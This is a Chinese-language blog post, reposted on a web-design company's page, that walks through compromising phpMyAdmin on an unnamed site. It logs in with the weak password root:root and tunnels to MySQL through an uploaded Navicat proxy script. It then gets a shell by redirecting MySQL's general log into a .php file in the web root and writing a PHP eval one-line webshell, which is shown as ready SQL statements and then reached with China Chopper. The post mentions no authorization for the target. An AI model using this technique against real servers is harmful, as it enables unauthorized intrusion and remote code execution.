這篇文章給大家分享的是有關(guān)Phpmyadmin滲透測(cè)試的示例的內(nèi)容。小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過來看看吧。

成都創(chuàng)新互聯(lián)專注于長(zhǎng)白網(wǎng)站建設(shè)服務(wù)及定制，我們擁有豐富的企業(yè)做網(wǎng)站經(jīng)驗(yàn)。 熱誠(chéng)為您提供長(zhǎng)白營(yíng)銷型網(wǎng)站建設(shè)，長(zhǎng)白網(wǎng)站制作、長(zhǎng)白網(wǎng)頁設(shè)計(jì)、長(zhǎng)白網(wǎng)站官網(wǎng)定制、微信小程序服務(wù)，打造長(zhǎng)白網(wǎng)絡(luò)公司原創(chuàng)品牌,更為您提供長(zhǎng)白網(wǎng)站排名全網(wǎng)營(yíng)銷落地服務(wù)。

首先通過目錄掃描對(duì)某站進(jìn)行掃描，發(fā)現(xiàn)存在phpmyadmin，嘗試弱口令root：root很幸運(yùn)進(jìn)去了

嘗試使用Navicate進(jìn)行數(shù)據(jù)庫連接返回禁止遠(yuǎn)程連接數(shù)據(jù)庫：

但是遠(yuǎn)程命令執(zhí)行發(fā)現(xiàn)本地3306端口時(shí)開放的，于是嘗試通過代理進(jìn)行連接：

Navicat安裝目錄下上傳ntunnel_MySQL.php文件（數(shù)據(jù)庫的代理腳本）到目標(biāo)服務(wù)器任意web站點(diǎn)目錄（后面getshell后上傳的）

上傳到D:/phpStudy/WWW目錄進(jìn)行訪問http://XXX/ntunnel_mysql.php 測(cè)試成功

進(jìn)行測(cè)試連接：

（此時(shí),在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個(gè)url,說白點(diǎn)兒就是個(gè)代理端,勾上使用base64編碼,防止waf從中作祟,然后主機(jī)名寫localhost,賬號(hào)密碼寫lnmp01本地?cái)?shù)據(jù)庫用戶的賬號(hào)即可,因?yàn)橐B接lnmp01本地的mysql）

Phpmyadmin Get Shell：

利用日志文件

mysql 5.0版本以上會(huì)創(chuàng)建日志文件，修改日志的全局變量，也可以getshell。但是也要對(duì)生成的日志有可讀可寫的權(quán)限。

set global general_log = "ON";   #當(dāng)開啟general時(shí)，所執(zhí)行的sql語句都會(huì)出現(xiàn)在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所執(zhí)行的sql語句就會(huì)對(duì)應(yīng)生成進(jìn)而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #對(duì)應(yīng)就會(huì)生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #將一句話木馬寫入test1234.php文件

菜刀連接：

感謝各位的閱讀！關(guān)于“Phpmyadmin滲透測(cè)試的示例”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！

標(biāo)題名稱：Phpmyadmin滲透測(cè)試的示例
瀏覽路徑：http://jinyejixie.com/article42/ppjjhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)頁設(shè)計(jì)公司、外貿(mào)建站、品牌網(wǎng)站設(shè)計(jì)、網(wǎng)站策劃、全網(wǎng)營(yíng)銷推廣、軟件開發(fā)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)